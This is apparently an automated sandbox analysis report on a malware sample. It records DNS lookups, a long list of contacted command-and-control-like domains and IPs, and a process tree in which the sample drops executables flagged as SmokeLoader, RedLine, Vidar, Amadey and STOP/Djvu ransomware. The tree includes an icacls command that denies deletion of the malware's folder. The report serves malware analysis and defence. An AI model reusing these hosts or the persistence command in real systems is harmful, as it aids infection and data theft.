                                                                                                                            May 28, 2023 10:43:51.665191889 CEST8.8.8.8192.168.2.30x2561No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:51.665191889 CEST8.8.8.8192.168.2.30x2561No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:51.665191889 CEST8.8.8.8192.168.2.30x2561No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:51.665191889 CEST8.8.8.8192.168.2.30x2561No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:51.665191889 CEST8.8.8.8192.168.2.30x2561No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:51.665191889 CEST8.8.8.8192.168.2.30x2561No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:51.665191889 CEST8.8.8.8192.168.2.30x2561No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:51.665191889 CEST8.8.8.8192.168.2.30x2561No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:51.665191889 CEST8.8.8.8192.168.2.30x2561No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:52.439465046 CEST8.8.8.8192.168.2.30xcfb6No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:57.183255911 CEST8.8.8.8192.168.2.30xb748No error (0)adsmanager.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:57.183255911 CEST8.8.8.8192.168.2.30xb748No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:57.183255911 CEST8.8.8.8192.168.2.30xb748No error (0)star.c10r.facebook.com157.240.17.17A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:57.786288977 CEST8.8.8.8192.168.2.30x9b9bNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:57.786288977 CEST8.8.8.8192.168.2.30x9b9bNo error (0)star-mini.c10r.facebook.com157.240.234.35A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:59.847691059 CEST8.8.8.8192.168.2.30xdec8No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:44:04.979201078 CEST8.8.8.8192.168.2.30x92cbNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                            • speedlab.com.eg
                                                                                                                            • api.2ip.ua
                                                                                                                            • t.me
                                                                                                                            • adsmanager.facebook.com
                                                                                                                            • www.facebook.com
                                                                                                                            • shsplatform.co.uk
                                                                                                                            • xlqkimn.org
                                                                                                                              • potunulit.org
                                                                                                                            • mxltwpsqeo.net
                                                                                                                            • colisumy.com
                                                                                                                            • csusaymthn.com
                                                                                                                            • iviost.org
                                                                                                                            • wkqar.net
                                                                                                                            • dudvlk.com
                                                                                                                            • 45.9.74.80
                                                                                                                            • zexeq.com
                                                                                                                            • qqiuoruppq.com
                                                                                                                            • ybcrbcpvym.com
                                                                                                                            • jp.imgjeoighw.com
                                                                                                                            • negwl.net
                                                                                                                            • sfmvlnbt.com
                                                                                                                            • mbwheantep.net
                                                                                                                            • ajoab.net
                                                                                                                            • wjhcfonfk.org
                                                                                                                            • ipame.net
                                                                                                                            • bxpeemr.org
                                                                                                                            • kxvorcn.com
                                                                                                                            • pppdb.org
                                                                                                                            • shwsp.org
                                                                                                                            • 188.34.154.187:30303
                                                                                                                            • vyuaut.com
                                                                                                                            • waofgmma.org
                                                                                                                            • gtnvc.net
                                                                                                                            • lfcxfryvi.com
                                                                                                                            • tcovw.org
                                                                                                                            • dpvseurycv.org
                                                                                                                            • oqqtqnj.org
                                                                                                                            • ykcanuky.org
                                                                                                                            • wuwnf.net
                                                                                                                            • yyabnclq.com
                                                                                                                            • dyrfgkau.org
                                                                                                                            • uytll.net
                                                                                                                            • cxhhlcn.com
                                                                                                                            • laydyxa.com
                                                                                                                            • oluqgvm.org
                                                                                                                            • lugojs.net
                                                                                                                            • aomtmlmpuh.org
                                                                                                                            • cfjtxu.com
                                                                                                                            • sbcht.com
                                                                                                                              • toobussy.com
                                                                                                                            • akimoe.net
                                                                                                                            • dlaxujokn.org
                                                                                                                            • ss.apjeoighw.com
                                                                                                                            • dmcdswi.net
                                                                                                                            • fgfsyqph.org
                                                                                                                            • xmewqwgqx.org
                                                                                                                            • dsoav.org
                                                                                                                            • ollfl.org
                                                                                                                            • ylfleydl.org
                                                                                                                            • etftmd.org
                                                                                                                            • 194.180.48.90
                                                                                                                            • fglqosxf.org
                                                                                                                            • qlcjnrapy.net
                                                                                                                            • fatvkcvmxq.net
                                                                                                                            • vacsrkw.com
                                                                                                                            • cdgmadwmn.net
                                                                                                                            • vplsfigg.com
                                                                                                                            • doqsqrp.net
                                                                                                                            • nypsigtije.net
                                                                                                                            • wjgjontf.org
                                                                                                                            • atqoikuxkw.net
                                                                                                                            • octqh.com
                                                                                                                            • xgeaptg.net

                                                                                                                            Click to jump to process

                                                                                                                            Target ID:0
                                                                                                                            Start time:10:41:55
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\Desktop\01860199.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\Desktop\01860199.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:289280 bytes
                                                                                                                            MD5 hash:3D8207E1CE6762FF10DB118BEE3BD99B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.380036043.0000000000859000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.380148014.0000000002421000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.380148014.0000000002421000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.380129580.0000000002400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.380129580.0000000002400000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.380107918.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low

                                                                                                                            Target ID:1
                                                                                                                            Start time:10:42:01
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                                            Imagebase:0x7ff69fe90000
                                                                                                                            File size:3933184 bytes
                                                                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            Target ID:4
                                                                                                                            Start time:10:42:34
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Roaming\hwgujdv
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\hwgujdv
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:289280 bytes
                                                                                                                            MD5 hash:3D8207E1CE6762FF10DB118BEE3BD99B
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.445989950.0000000000738000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.445573902.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.445573902.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.445509996.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.446406704.00000000022D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.446406704.00000000022D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 38%, ReversingLabs
                                                                                                                            Reputation:low

                                                                                                                            Target ID:5
                                                                                                                            Start time:10:42:37
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:802304 bytes
                                                                                                                            MD5 hash:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.442702951.00000000024A5000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            Reputation:low

                                                                                                                            Target ID:6
                                                                                                                            Start time:10:42:37
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:802304 bytes
                                                                                                                            MD5 hash:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low

                                                                                                                            Target ID:7
                                                                                                                            Start time:10:42:38
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\C861.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\C861.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:288768 bytes
                                                                                                                            MD5 hash:7A8E3D000FBA0F5765B98E2D78EB9D12
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.460164953.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.460214856.0000000000838000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            Reputation:low

                                                                                                                            Target ID:9
                                                                                                                            Start time:10:42:39
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:icacls "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                            Imagebase:0x310000
                                                                                                                            File size:29696 bytes
                                                                                                                            MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            Target ID:10
                                                                                                                            Start time:10:42:39
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 68 -ip 68
                                                                                                                            Imagebase:0x1190000
                                                                                                                            File size:434592 bytes
                                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            Target ID:11
                                                                                                                            Start time:10:42:39
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 68 -s 520
                                                                                                                            Imagebase:0x1190000
                                                                                                                            File size:434592 bytes
                                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            Target ID:13
                                                                                                                            Start time:10:42:40
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe --Task
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:802304 bytes
                                                                                                                            MD5 hash:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.450548636.0000000002490000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low

                                                                                                                            Target ID:16
                                                                                                                            Start time:10:42:41
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe --Task
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:802304 bytes
                                                                                                                            MD5 hash:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low

                                                                                                                            Target ID:18
                                                                                                                            Start time:10:42:41
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\D804.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:802304 bytes
                                                                                                                            MD5 hash:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.451349547.00000000023B3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low

                                                                                                                            Target ID:19
                                                                                                                            Start time:10:42:42
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\D804.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:802304 bytes
                                                                                                                            MD5 hash:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low

                                                                                                                            Target ID:20
                                                                                                                            Start time:10:42:44
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\3C54.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\3C54.exe
                                                                                                                            Imagebase:0x4a0000
                                                                                                                            File size:5129728 bytes
                                                                                                                            MD5 hash:2AF03D52F9CF9E53DFFC1183B403E1B7
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.507574434.0000000004050000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\3C54.exe, Author: ditekSHen
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Avira
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 70%, ReversingLabs
                                                                                                                            Reputation:moderate

                                                                                                                            Target ID:21
                                                                                                                            Start time:10:42:46
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\aafg31.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\aafg31.exe"
                                                                                                                            Imagebase:0x7ff777030000
                                                                                                                            File size:973312 bytes
                                                                                                                            MD5 hash:B4F79B3194235084A3EC85711EDFBD38
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 33%, ReversingLabs

                                                                                                                            Target ID:22
                                                                                                                            Start time:10:42:47
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\NewPlayer.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\NewPlayer.exe"
                                                                                                                            Imagebase:0x60000
                                                                                                                            File size:255488 bytes
                                                                                                                            MD5 hash:08240E71429B32855B418A4ACF0E38EC
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000000.460937652.0000000000061000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000002.476037262.0000000000061000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exe, Author: Joe Security
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 88%, ReversingLabs

                                                                                                                            Target ID:23
                                                                                                                            Start time:10:42:49
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\XandETC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\XandETC.exe"
                                                                                                                            Imagebase:0x7ff6a7fc0000
                                                                                                                            File size:3890176 bytes
                                                                                                                            MD5 hash:3006B49F3A30A80BB85074C279ACC7DF
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 73%, ReversingLabs

                                                                                                                            Target ID:24
                                                                                                                            Start time:10:42:49
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:335360 bytes
                                                                                                                            MD5 hash:B888EFE68F257AA2335ED9CBD63C1343
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000018.00000002.478487593.00000000008C8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 87%, ReversingLabs

                                                                                                                            Target ID:25
                                                                                                                            Start time:10:42:51
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\B46F.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\B46F.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:802304 bytes
                                                                                                                            MD5 hash:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.473949878.0000000002434000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML

                                                                                                                            Target ID:26
                                                                                                                            Start time:10:42:51
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\B46F.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\B46F.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:802304 bytes
                                                                                                                            MD5 hash:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

                                                                                                                            Target ID:27
                                                                                                                            Start time:10:42:51
                                                                                                                            Start date:28/05/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\A170.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\A170.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:809984 bytes
                                                                                                                            MD5 hash:15BC205C2CAF7196EE2267087C3B2BB8
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
